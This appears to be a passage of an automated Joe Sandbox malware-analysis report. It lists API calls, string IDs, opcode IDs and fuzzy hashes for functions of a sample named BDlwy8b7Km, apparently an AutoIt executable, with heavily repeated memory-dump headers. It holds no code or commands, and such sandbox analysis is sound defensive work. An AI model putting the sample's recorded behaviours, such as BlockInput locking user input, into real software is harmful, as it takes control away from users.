                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005C6766,?,?,00000008,?,?,005CFEFE,00000000), ref: 005C6998
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: b417a79793c1c407beb02a706bc215d7982fbcf9e12b9bac81ff47da6855e6c7
                                                  • Instruction ID: 4e1d55b87c6c5b6ef17ebc6aec985969a9571bcb41602c0163fc3460a8d5fdc1
                                                  • Opcode Fuzzy Hash: b417a79793c1c407beb02a706bc215d7982fbcf9e12b9bac81ff47da6855e6c7
                                                  • Instruction Fuzzy Hash: FCB10435610609DFDB19CF68C48AB657FE0FF45364F25865CE89ACB2A2C335EA91CB40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 91dd183926c0db01c11546e313452ec1817240c771bbd7c7d904609325f4f20e
                                                  • Instruction ID: 30065ac5f4e0204776881f1fdf7a92006f744e6e2d324cc6732374f6caa14e8b
                                                  • Opcode Fuzzy Hash: 91dd183926c0db01c11546e313452ec1817240c771bbd7c7d904609325f4f20e
                                                  • Instruction Fuzzy Hash: 55124E759002299FDF14CF59C8806BEBBB5FF49710F14859AE849EB256EB309E81CF90
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 0060EABD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 4c651901ff11293934ac7b20ce2f26efc6f7a2c2e7b359c05ce4a58471e17474
                                                  • Instruction ID: 26b5411802b7cc59077aa440e44c1bacf722fcd25056b33c554818293d2214a2
                                                  • Opcode Fuzzy Hash: 4c651901ff11293934ac7b20ce2f26efc6f7a2c2e7b359c05ce4a58471e17474
                                                  • Instruction Fuzzy Hash: F7E01A322002159FD710EF59D808E9ABBEABF98760F008416FC49C73A1DA71A8418BA0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005B03EE), ref: 005B09DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: eed593a5dd8fdef3e11c083b5b174556de67d8cabc184ff7f90232629539b391
                                                  • Instruction ID: 500cb0f325e369c335bc9184adc2bae526c3c1f43d5cd1fda763a3e6e19c3381
                                                  • Opcode Fuzzy Hash: eed593a5dd8fdef3e11c083b5b174556de67d8cabc184ff7f90232629539b391
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                  • Instruction ID: 42391102777ea59033e9271cbaf080d359128587170e8e4032033e8fa4c5bdf1
                                                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                  • Instruction Fuzzy Hash: B1515A7160C70E5BDB384968885E7FE6F99BBDE340F180949F882E7282C615FE41D356
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0&f
                                                  • API String ID: 0-3156573131
                                                  • Opcode ID: cfd7c7a113f45e24bc2e490915e2ff2820d876a1dd60742958f41cc3b5362e84
                                                  • Instruction ID: 714797d65f43ef3bed5c1654077ffe9f41d2040ec077073acadbfb5a0cf76953
                                                  • Opcode Fuzzy Hash: cfd7c7a113f45e24bc2e490915e2ff2820d876a1dd60742958f41cc3b5362e84
                                                  • Instruction Fuzzy Hash: D921A8326606128BD72CCE79C8276BA73E6AB54310F15862EE4A7C37D0DE75A904C740
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 680f1d3e7e1f3dd08d4c6a96f58e680318413b684295a77c7d6a4b239dd89ef4
                                                  • Instruction ID: a3aed60bce83f644dbaf48150abfdbf780b12ab8c979b53f93434eb207030b8f
                                                  • Opcode Fuzzy Hash: 680f1d3e7e1f3dd08d4c6a96f58e680318413b684295a77c7d6a4b239dd89ef4
                                                  • Instruction Fuzzy Hash: D6322331D28F054DD7239634D822335AA89BFBB3C5F14E72BE81AB5DA6EB28C4834540
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ad3fa34b40242ead8fad4e6360a6a9a8c5db124c2633d001d169838bbe77356
                                                  • Instruction ID: 9bc48e26edb96427fcb6a1c3002b3b0c4f7b668b29187b075e7b67011d8db586
                                                  • Opcode Fuzzy Hash: 1ad3fa34b40242ead8fad4e6360a6a9a8c5db124c2633d001d169838bbe77356
                                                  • Instruction Fuzzy Hash: 4232F931A041958BDF2CCF2AC4A467D7FA2FB46314F28856AD4EA9B691D230DD83DB41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65369d035a321c6cbe69d28776ef833e5a8dda9a8765e83f80c9095f21d72fe0
                                                  • Instruction ID: 06184b61ad0643c7fe641293f95f5b7360e6ca1b6ab7fd5d4000a401d6fc5f02
                                                  • Opcode Fuzzy Hash: 65369d035a321c6cbe69d28776ef833e5a8dda9a8765e83f80c9095f21d72fe0
                                                  • Instruction Fuzzy Hash: 3B229070A0460ADFDF14CFA8D845AAEBBF6FF48300F14452AE816A7391EB35AD55CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5568124d4b5e8b30431668d2bf992195b868cf0c7959137352872658abc4344d
                                                  • Instruction ID: d448299af248025ed72617b6c24c6db6509a60df227c923a498e27df093d5e8f
                                                  • Opcode Fuzzy Hash: 5568124d4b5e8b30431668d2bf992195b868cf0c7959137352872658abc4344d
                                                  • Instruction Fuzzy Hash: C902B8B0A00206EBDF15EF58D885AADBFB5FF44300F50856AE4169B391EB31EE51CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: b86d428f9391bd24c51745c9cd8ad46a8b37c46763a9cdfd14659126db444cb9
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: 209198721084E34EDBA9463E85740BEFFE17A923A135A079DD4F2CA1C5FE20E964D624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: 31b0d22d7781b67e676e8a162905f9a9c1b87ed24418b0d9793586ecb7dc8a25
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: DA91C6322098E34EDBAD427A85740BEFFE17A923A135A079DD4F2CA1C1FE14F554D624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bee425c759e1dd10985b5bc306addfeb386125568c435ea35b044ea35e73df60
                                                  • Instruction ID: 8197d2a4a70b90e2709efa14437f21afc291e4d4b12adebc525953ce14236d70
                                                  • Opcode Fuzzy Hash: bee425c759e1dd10985b5bc306addfeb386125568c435ea35b044ea35e73df60
                                                  • Instruction Fuzzy Hash: 2061397120870E66DE7499288D9ABFE2F98FFCD700F240D19E942DB2D1E911BE42CB55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: b0a07fd77324ef964fa0a1518a94c1b48b4e8b82b402f6b9e51f217fcc3f4e3e
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: F68198336084E34DDBAD423A85344BEFFE1BA923A135A079DE4F2CB1C1EE24E554D624
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00612B30
                                                  • DeleteObject.GDI32(00000000), ref: 00612B43
                                                  • DestroyWindow.USER32 ref: 00612B52
                                                  • GetDesktopWindow.USER32 ref: 00612B6D
                                                  • GetWindowRect.USER32(00000000), ref: 00612B74
                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00612CA3
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00612CB1
                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612CF8
                                                  • GetClientRect.USER32(00000000,?), ref: 00612D04
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00612D40
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D62
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D75
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D80
                                                  • GlobalLock.KERNEL32(00000000), ref: 00612D89
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D98
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00612DA1
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DA8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00612DB3
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DC5
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0062FC38,00000000), ref: 00612DDB
                                                  • GlobalFree.KERNEL32(00000000), ref: 00612DEB
                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00612E11
                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00612E30
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612E52
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061303F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: 8d901bec62d91785549e2b483165a18760ae526cb328eeebd04c66268ed0a970
                                                  • Instruction ID: 5c9d8329e41d9ef0b2f10d25180044c07a71c00d132b039c9ed75baf9540153c
                                                  • Opcode Fuzzy Hash: 8d901bec62d91785549e2b483165a18760ae526cb328eeebd04c66268ed0a970
                                                  • Instruction Fuzzy Hash: B7027C71900615EFDB24DF64CD89EAE7BBAFF49320F048158F915AB2A1DB70AD41CB60
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 0062712F
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00627160
                                                  • GetSysColor.USER32(0000000F), ref: 0062716C
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00627186
                                                  • SelectObject.GDI32(?,?), ref: 00627195
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 006271C0
                                                  • GetSysColor.USER32(00000010), ref: 006271C8
                                                  • CreateSolidBrush.GDI32(00000000), ref: 006271CF
                                                  • FrameRect.USER32(?,?,00000000), ref: 006271DE
                                                  • DeleteObject.GDI32(00000000), ref: 006271E5
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00627230
                                                  • FillRect.USER32(?,?,?), ref: 00627262
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00627284
                                                    • Part of subcall function 006273E8: GetSysColor.USER32(00000012), ref: 00627421
                                                    • Part of subcall function 006273E8: SetTextColor.GDI32(?,?), ref: 00627425
                                                    • Part of subcall function 006273E8: GetSysColorBrush.USER32(0000000F), ref: 0062743B
                                                    • Part of subcall function 006273E8: GetSysColor.USER32(0000000F), ref: 00627446
                                                    • Part of subcall function 006273E8: GetSysColor.USER32(00000011), ref: 00627463
                                                    • Part of subcall function 006273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00627471
                                                    • Part of subcall function 006273E8: SelectObject.GDI32(?,00000000), ref: 00627482
                                                    • Part of subcall function 006273E8: SetBkColor.GDI32(?,00000000), ref: 0062748B
                                                    • Part of subcall function 006273E8: SelectObject.GDI32(?,?), ref: 00627498
                                                    • Part of subcall function 006273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006274B7
                                                    • Part of subcall function 006273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006274CE
                                                    • Part of subcall function 006273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006274DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: 11cf06dcc067598dac3ca2f9d410fc075a2e77fa3a0b60a1fd60a9ffc1e4babe
                                                  • Instruction ID: 96bbeaa7704b07da6083ba90a2d713d0b04564de6f665de760c77d62ba981882
                                                  • Opcode Fuzzy Hash: 11cf06dcc067598dac3ca2f9d410fc075a2e77fa3a0b60a1fd60a9ffc1e4babe
